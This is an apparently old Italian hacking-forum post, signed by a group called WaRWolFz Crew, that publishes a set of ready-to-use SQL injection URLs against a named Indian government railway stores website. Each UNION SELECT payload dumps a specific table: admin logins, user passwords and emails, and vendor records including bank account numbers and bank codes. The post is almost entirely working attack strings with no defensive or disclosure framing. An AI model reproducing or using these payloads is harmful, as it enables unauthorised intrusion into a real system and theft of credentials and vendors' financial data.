Stores.SouthernRailWay.Gov.In SQL Injection

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
I

imported_D4nt3

Utente Silver
6 Gennaio 2008
0
0
0
57
Codice: 
######################################################################################
# Author/s: Dante90, WaRWolFz Crew                                                   #
# Target: http://www.stores.southernrailway.gov.in/                                  #
# Web: www.warwolfz.org                                                              #
# Vulnerability: SQL Injection                                                       #
######################################################################################
Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(uid,CHAR(32,58,32),name,CHAR(32,58,32),pwd),CONCAT_WS(CHAR(32,58,32),sl,uid,pwd,name,CHAR(124,32)),5,6,7 FROM web_login--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(uid,CHAR(32,58,32),name,CHAR(32,58,32),pwd),CONCAT_WS(CHAR(32,58,32),id,uid,pwd,name,cat,rem,CHAR(124,32)),5,6,7 FROM telemed_login--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(ID,CHAR(32,58,32),SUPPBKNAME,CHAR(32,58,32),PASSWORD),CONCAT_WS(CHAR(32,58,32),ID,EFTREFNO,SUPPNAME,ADD1,ADD2,ADD3,CITY,STATE,PINCODE,SUPPBKCODE,SUPPACNO,SUPPBKNAME,EMAILID,PASSWORD,DOR,DOLL,temp_str,CHAR(124,32)),5,6,7 FROM stores_vendor_master--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(ID,CHAR(32,58,32),SUPPBKNAME,CHAR(32,58,32),PASSWORD),CONCAT_WS(CHAR(32,58,32),ID,EFTREFNO,SUPPNAME,ADD1,ADD2,ADD3,CITY,STATE,PINCODE,SUPPBKCODE,SUPPACNO,SUPPBKNAME,EMAILID,PASSWORD,DOR,DOLL,CHAR(124,32)),5,6,7 FROM stores2_vendor_master--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(id,CHAR(32,58,32),admin_username,CHAR(32,58,32),admin_password),CONCAT_WS(CHAR(32,58,32),id,admin_password,admin_username,CHAR(124,32)),5,6,7 FROM mnl_admin--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(ID,CHAR(32,58,32),SUPPBKNAME,CHAR(32,58,32),PASSWORD),CONCAT_WS(CHAR(32,58,32),ID,EFTREFNO,SUPPNAME,ADD1,ADD2,ADD3,CITY,STATE,PINCODE,SUPPBKCODE,SUPPACNO,SUPPBKNAME,EMAILID,PASSWORD,DOR,DOLL,CHAR(124,32)),5,6,7 FROM mas_vendor_master--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(name,CHAR(32,58,32),email,CHAR(32,58,32),password),CONCAT_WS(CHAR(32,58,32),name,email,password,CHAR(124,32)),5,6,7 FROM login--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(ID,CHAR(32,58,32),SUPPBKNAME,CHAR(32,58,32),PASSWORD),CONCAT_WS(CHAR(32,58,32),ID,EFTREFNO,SUPPNAME,ADD1,ADD2,ADD3,CITY,STATE,PINCODE,SUPPBKCODE,SUPPACNO,SUPPBKNAME,EMAILID,PASSWORD,DOR,DOLL,CHAR(124,32)),5,6,7 FROM hq_vendor_master--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(user_id,CHAR(32,58,32),user_name,CHAR(32,58,32),user_password,CHAR(32,58,32),user_email),CONCAT_WS(CHAR(32,58,32),user_id,user_name,user_password,user_email,CHAR(124,32)),5,6,7 FROM gallery_users--

Codice: 
http://www.stores.southernrailway.gov.in/index.php?pgid=-1 UNION SELECT 1,2,CONCAT(ID,CHAR(32,58,32),SUPPBKNAME,CHAR(32,58,32),PASSWORD),CONCAT_WS(CHAR(32,58,32),ID,EFTREFNO,SUPPNAME,ADD1,ADD2,ADD3,CITY,STATE,PINCODE,SUPPBKCODE,SUPPACNO,SUPPBKNAME,EMAILID,PASSWORD,DOR,DOLL,CHAR(124,32)),5,6,7 FROM conms_vendor_master--

Dante90
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

M
Estrarre un token API di aws da poter poi utilizzare su appscript
  • 0
  • 334
0
334
Il tuo Software
MRPants
Top Bottom
Indietro